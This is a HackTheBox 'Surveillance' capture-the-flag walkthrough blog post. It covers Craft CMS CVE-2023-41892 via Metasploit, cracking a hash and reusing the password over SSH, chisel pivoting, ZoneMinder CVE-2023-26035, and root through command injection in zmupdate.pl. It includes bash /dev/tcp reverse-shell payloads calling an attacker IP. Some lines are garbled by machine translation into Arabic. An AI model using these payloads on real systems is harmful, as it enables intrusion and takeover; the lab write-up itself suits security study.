We covered the walkthrough of HackTheBox Surveillance where we demonstrated the exploitation of the recent vulnerability CVE-2023-41892 that affected Craft CMS in addition to the exploitation of CVE-2023-26035 that affected ZoneMinder which is an integrated set of applications which provide a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine.

Before we start, add the host IP to the hosts file with the machine name

echo '10.10.11.245    surveillance.htb' | sudo tee -a /etc/hosts

ملاحظات دراسة الأمن السيبراني

ملاحظات دراسة OSCP

Scanning and Enumeration

Nmap scan results are below

Command: nmap -Pn -p- —

# Nmap 7.94SVN scan initiated Wed Jan 24 16:36:46 2024 as: nmap -Pn -p- --min-rate 5000 -A -oN nmap.txt 10.10.11.245
Nmap scan report for 10.10.11.245
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=1%CU=42608%PV=Y%DS=2%DC=T%G=Y%TM=65B1
OS:830B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   11.81 ms 10.10.14.1
2   11.87 ms 10.10.11.245

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 24 16:37:15 2024 -- 1 IP address (1 host up) scanned in 29.07 seconds

On port 80, we have an nginx server

80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Browsing to the main webserver page shows that it’s a potentially a Craft CMS server

Additionally, the admin page can be found by running a directory enumeration using Gobuster using the below command

gobuster dir -u http://surveillance.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html -r -o gobuster-80.txt -t 100

And the admin page, can be found at: /admin/login

Craft CMS Vulnerability Exploitation

What is Craft CMS?

Craft CMS is a Content Management System that is easy and clear. It offers every mechanism needed to do the everyday chores needed for a functional website. Content integration is going to be hassle-free, no doubt.

The version of the Craft CMS is vulnerable to CVE-2023-41892 with this POC available publicly.

Understanding The Exploit

  1. ال getTmpUploadDirAndDocumentRoot() allows you to execute phpinfo  which reads the main web root in addition to the upload directory.
  2. ال writePayloadToTempFile(documentRoot) function yieldsHTTP 502 HTTP error indicating successful exploit. We can write arbitrary PHP code to the site root as though it were an image by using the vulnerable Imagick extension.
  3. ال trigerImagick(tmpDir) function performs a call to the Imagick extension to read our PHP file. The Imagick extension then reads our file and executes the PHP code.

Some people reported problems running the exploit so if this happened with you, you can then follow the Metasploit method outlined below.

Craft CMS Vulnerability Exploitation with Metasploit


sudo msfconsole

Then choose exploit/linux/http/craftcms_unauth_rce_cve_2023_41892

msf6 > use 1
msf6 > set rhosts surveillance.htb
msf6 > set rport 80
msf6 > set ssl false
msf6 > set lhost tun0
msf6 > set lport 443
msf6 > run

And it should be done and you can move on to post exploitation and privilege escalation phase.

Post Exploitation & Privilege Escalation

Running من أنا و uname -a shows the below output as to the operating system and user running on the machine

PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

Linux surveillance 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

uid=33(www-data) gid=33(www-data) مجموعات=33(www-data)

After some OS enumeration, we noticed an SQL backup in the below path

/var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip

This database contained an unsalted SHA256 hash for user matthew.

You can verify this by running below command

 cat /var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip | grep -i matt

Password Cracking with JohnTheRipper

Execute below commands to add the hash into a file and crack it using John with rockyou.txt wordlist.

echo '39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec' > hash

john --format=Raw-SHA256 --wordlist=rockyou.txt hash

You will find that the password is starcraftt122490 then we use it to log in as matthew.

ssh matthew@surveillance.htb

Network Pivoting & Lateral Movement

By running netstat to figure out the network connections internally, we found that The zoneminder service is listening on 127.0.0.1:8080

This which will require us use port forwarding to be able to interact with this service.

يمكننا ان نستخدم chisel which you can download and run using below commands

wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz

gunzip ./chisel.gz

chmod u+x ./chisel.gz

sudo python3 -m http.server 80

We host chisel on the attacker machine to be able to download it to the htb machine.

wget http://kali-vpn-ip/chisel -O /tmp/chisel
chmod u+x /tmp/chisel

Then we can run chisel with below command on the attacker machine:

sudo ./chisel server --reverse --port 8081 &

And on the HTB machine

/tmp/chisel client 10.10.14.10:8081 R:99090:127.0.0.1:8080 R:3306:127.0.0.1:3006 &

If all is done well, you should be able to navigate to 127.0.0.1:99090 to access the ZoneMinder Service whose version appears to be 1.36.32.

ZoneMinder Exploitation

What is ZoneMinder?

ZoneMinder is an integrated set of applications which provide a complete surveillance solution allowing capture, analysis, recording and monitoring of any CCTV or security cameras attached to a Linux based machine. It is designed to run on distributions which support the Video For Linux (V4L) interface and has been tested with video cameras attached to BTTV cards, various USB cameras and also supports most IP network cameras.

A little bit of researching and Googling shows that its a vulnerable version CVE-2023-26035

To get the exploit to work, just change line 16 from فهرس.php ل /index.php.

Run the exploit

./zm-pwn.py --target http://127.0.0.1:99090 --cmd "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/4444 0>&1'"

Of course don’t forget to run a listener on your machine using netcat

nc- lvp 4444

Doing this will get you shell as zoneminder مستخدم.

Note that any zm[a-zA-Z]*.pl script in /usr/bin/ can be run without a password by the zoneminder user.

You often encounter PHP scripts abusing the exec(), shell_exec(), or system() APIs to execute commands on the host.

When looking for Perl scripts to accomplish this, we found the exec() command.

The only issue is that, save from one script, none of these employ this command, and it is not vulnerable.

These Perl scripts do seem to frequently reference the execute() command, and from what I’ve looked up, it’s used to execute prepared SQL statements. Finding an execute() call that accepts a user parameter and does not limit the user to particular data types or inputs will thus be necessary.

The perl script zmupdate.pl that is susceptible. Where the script will take our username input and run it is on line 1056. The script will hash the inputs, therefore trying to exploit on a password won’t work.

If we execute the below command, we can see the ‘/bin/bash -ip’ injected into the prepared SQL statement

sudo /usr/bin/zmupdate.pl -u '/bin/bash -ip' -p '' -v 1

So this means if we run the command in a sub-shell it will be evaluated before the rest of the prepared SQL statement.

sudo /usr/bin/zmupdate.pl -u '$(bash -c "bash -ip >& /dev/tcp/10.10.14.10/443 0>&1")' -p '' -v 1

HackTheBox Surveillance Root & User Flags

User Flag


1f4b734f81280d55388c9ff39cd13152

Root Flag


3457f277222b96dc0f126f9d92defe37

HackTheBox CTF Walkthrough Playlist

, ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات